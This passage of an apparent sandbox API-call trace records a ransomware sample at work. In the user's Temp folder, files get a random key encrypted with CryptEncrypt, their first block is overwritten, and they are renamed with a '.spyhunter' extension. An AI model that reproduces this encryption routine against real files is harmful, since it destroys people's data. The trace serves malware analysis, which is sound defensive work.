lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0139.319] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.319] WriteFile (in: hFile=0x184, lpBuffer=0x57f2ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2ac, lpOverlapped=0x0 | out: lpBuffer=0x57f2ec*, lpNumberOfBytesWritten=0x57f2ac*=0x4, lpOverlapped=0x0) returned 1 [0139.319] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2ac*=0x30, lpOverlapped=0x0) returned 1 [0139.319] CloseHandle (hObject=0x184) returned 1 [0139.320] GetProcessHeap () returned 0x2c0000 [0139.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.320] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\VEjG.swf.spyhunter") returned 71 [0139.320] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\VEjG.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vejg.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\VEjG.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vejg.swf.spyhunter")) returned 1 [0139.321] GetProcessHeap () returned 0x2c0000 [0139.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.321] GetProcessHeap () returned 0x2c0000 [0139.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.321] GetProcessHeap () returned 0x2c0000 [0139.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85618 | out: hHeap=0x2c0000) returned 1 [0139.321] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2f0 | out: pbBuffer=0x57f2f0) returned 1 [0139.321] GetProcessHeap () returned 0x2c0000 [0139.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.322] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2e8*=0x30) returned 1 [0139.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\uq 40Rl3jdER9_56hcV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\uq 40rl3jder9_56hcv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\uq 40Rl3jdER9_56hcV.wav") returned 76 [0139.322] StrStrW (lpFirst="uq 40Rl3jdER9_56hcV.wav", lpSrch=".txt") returned 0x0 [0139.322] GetProcessHeap () returned 0x2c0000 [0139.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.322] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f2ac*=0x2800, lpOverlapped=0x0) returned 1 [0139.323] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.323] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f2ac*=0x2800, lpOverlapped=0x0) returned 1 [0139.324] GetProcessHeap () returned 0x2c0000 [0139.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0139.324] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.324] WriteFile (in: hFile=0x184, lpBuffer=0x57f2ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2ac, lpOverlapped=0x0 | out: lpBuffer=0x57f2ec*, lpNumberOfBytesWritten=0x57f2ac*=0x4, lpOverlapped=0x0) returned 1 [0139.324] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2ac*=0x30, lpOverlapped=0x0) returned 1 [0139.324] CloseHandle (hObject=0x184) returned 1 [0139.324] GetProcessHeap () returned 0x2c0000 [0139.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.324] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\uq 40Rl3jdER9_56hcV.wav.spyhunter") returned 86 [0139.324] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\uq 40Rl3jdER9_56hcV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\uq 40rl3jder9_56hcv.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\uq 40Rl3jdER9_56hcV.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\uq 40rl3jder9_56hcv.wav.spyhunter")) returned 1 [0139.325] GetProcessHeap () returned 0x2c0000 [0139.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.326] GetProcessHeap () returned 0x2c0000 [0139.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.326] GetProcessHeap () returned 0x2c0000 [0139.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ee78 | out: hHeap=0x2c0000) returned 1 [0139.326] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2e8 | out: pbBuffer=0x57f2e8) returned 1 [0139.326] GetProcessHeap () returned 0x2c0000 [0139.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.326] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2e0*=0x30) returned 1 [0139.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\U2BgApfxl0kb-.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\u2bgapfxl0kb-.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\U2BgApfxl0kb-.mp4") returned 70 [0139.327] StrStrW (lpFirst="U2BgApfxl0kb-.mp4", lpSrch=".txt") returned 0x0 [0139.327] GetProcessHeap () returned 0x2c0000 [0139.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.327] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f2a4*=0x2800, lpOverlapped=0x0) returned 1 [0139.328] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.328] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f2a4*=0x2800, lpOverlapped=0x0) returned 1 [0139.328] GetProcessHeap () returned 0x2c0000 [0139.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0139.328] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.328] WriteFile (in: hFile=0x184, lpBuffer=0x57f2e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2a4, lpOverlapped=0x0 | out: lpBuffer=0x57f2e4*, lpNumberOfBytesWritten=0x57f2a4*=0x4, lpOverlapped=0x0) returned 1 [0139.328] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2a4*=0x30, lpOverlapped=0x0) returned 1 [0139.328] CloseHandle (hObject=0x184) returned 1 [0139.328] GetProcessHeap () returned 0x2c0000 [0139.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.328] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\U2BgApfxl0kb-.mp4.spyhunter") returned 80 [0139.328] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\U2BgApfxl0kb-.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\u2bgapfxl0kb-.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\U2BgApfxl0kb-.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\u2bgapfxl0kb-.mp4.spyhunter")) returned 1 [0139.329] GetProcessHeap () returned 0x2c0000 [0139.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.329] GetProcessHeap () returned 0x2c0000 [0139.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.330] GetProcessHeap () returned 0x2c0000 [0139.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81108 | out: hHeap=0x2c0000) returned 1 [0139.362] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2d8 | out: pbBuffer=0x57f2d8) returned 1 [0139.362] GetProcessHeap () returned 0x2c0000 [0139.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.363] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2d0*=0x30) returned 1 [0139.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini") returned 110 [0139.364] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0139.364] GetProcessHeap () returned 0x2c0000 [0139.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0139.364] ReadFile (in: hFile=0x184, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f294, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f294*=0x43, lpOverlapped=0x0) returned 1 [0139.366] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.366] WriteFile (in: hFile=0x184, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x57f294, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f294*=0x43, lpOverlapped=0x0) returned 1 [0139.366] GetProcessHeap () returned 0x2c0000 [0139.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0139.366] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.366] WriteFile (in: hFile=0x184, lpBuffer=0x57f2d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f294, lpOverlapped=0x0 | out: lpBuffer=0x57f2d4*, lpNumberOfBytesWritten=0x57f294*=0x4, lpOverlapped=0x0) returned 1 [0139.366] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f294, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f294*=0x30, lpOverlapped=0x0) returned 1 [0139.366] CloseHandle (hObject=0x184) returned 1 [0139.366] GetProcessHeap () returned 0x2c0000 [0139.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.367] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini.spyhunter") returned 120 [0139.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini.spyhunter")) returned 1 [0139.368] GetProcessHeap () returned 0x2c0000 [0139.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.368] GetProcessHeap () returned 0x2c0000 [0139.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.368] GetProcessHeap () returned 0x2c0000 [0139.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc03c8 | out: hHeap=0x2c0000) returned 1 [0139.368] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2d8 | out: pbBuffer=0x57f2d8) returned 1 [0139.368] GetProcessHeap () returned 0x2c0000 [0139.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.368] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2d0*=0x30) returned 1 [0139.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.369] GetProcessHeap () returned 0x2c0000 [0139.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.369] GetProcessHeap () returned 0x2c0000 [0139.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67408 | out: hHeap=0x2c0000) returned 1 [0139.369] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2d0 | out: pbBuffer=0x57f2d0) returned 1 [0139.369] GetProcessHeap () returned 0x2c0000 [0139.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.369] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2c8*=0x30) returned 1 [0139.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.369] GetProcessHeap () returned 0x2c0000 [0139.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.369] GetProcessHeap () returned 0x2c0000 [0139.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c590 | out: hHeap=0x2c0000) returned 1 [0139.371] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2c8 | out: pbBuffer=0x57f2c8) returned 1 [0139.371] GetProcessHeap () returned 0x2c0000 [0139.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.371] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2c0*=0x30) returned 1 [0139.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.373] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini") returned 110 [0139.373] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0139.373] GetProcessHeap () returned 0x2c0000 [0139.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0139.374] ReadFile (in: hFile=0x184, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f284, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f284*=0x43, lpOverlapped=0x0) returned 1 [0139.374] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.375] WriteFile (in: hFile=0x184, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x57f284, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f284*=0x43, lpOverlapped=0x0) returned 1 [0139.375] GetProcessHeap () returned 0x2c0000 [0139.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0139.375] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.375] WriteFile (in: hFile=0x184, lpBuffer=0x57f2c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f284, lpOverlapped=0x0 | out: lpBuffer=0x57f2c4*, lpNumberOfBytesWritten=0x57f284*=0x4, lpOverlapped=0x0) returned 1 [0139.375] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f284, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f284*=0x30, lpOverlapped=0x0) returned 1 [0139.375] CloseHandle (hObject=0x184) returned 1 [0139.375] GetProcessHeap () returned 0x2c0000 [0139.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.375] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini.spyhunter") returned 120 [0139.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini.spyhunter")) returned 1 [0139.376] GetProcessHeap () returned 0x2c0000 [0139.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.376] GetProcessHeap () returned 0x2c0000 [0139.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.377] GetProcessHeap () returned 0x2c0000 [0139.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc02a0 | out: hHeap=0x2c0000) returned 1 [0139.377] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2c8 | out: pbBuffer=0x57f2c8) returned 1 [0139.377] GetProcessHeap () returned 0x2c0000 [0139.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.377] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2c0*=0x30) returned 1 [0139.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.378] GetProcessHeap () returned 0x2c0000 [0139.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.378] GetProcessHeap () returned 0x2c0000 [0139.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c478 | out: hHeap=0x2c0000) returned 1 [0139.378] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2c0 | out: pbBuffer=0x57f2c0) returned 1 [0139.378] GetProcessHeap () returned 0x2c0000 [0139.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.378] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2b8*=0x30) returned 1 [0139.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.379] GetProcessHeap () returned 0x2c0000 [0139.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.379] GetProcessHeap () returned 0x2c0000 [0139.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c360 | out: hHeap=0x2c0000) returned 1 [0139.380] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2b8 | out: pbBuffer=0x57f2b8) returned 1 [0139.380] GetProcessHeap () returned 0x2c0000 [0139.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.380] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2b0*=0x30) returned 1 [0139.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini") returned 110 [0139.380] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0139.381] GetProcessHeap () returned 0x2c0000 [0139.381] RtlAllocateHeap 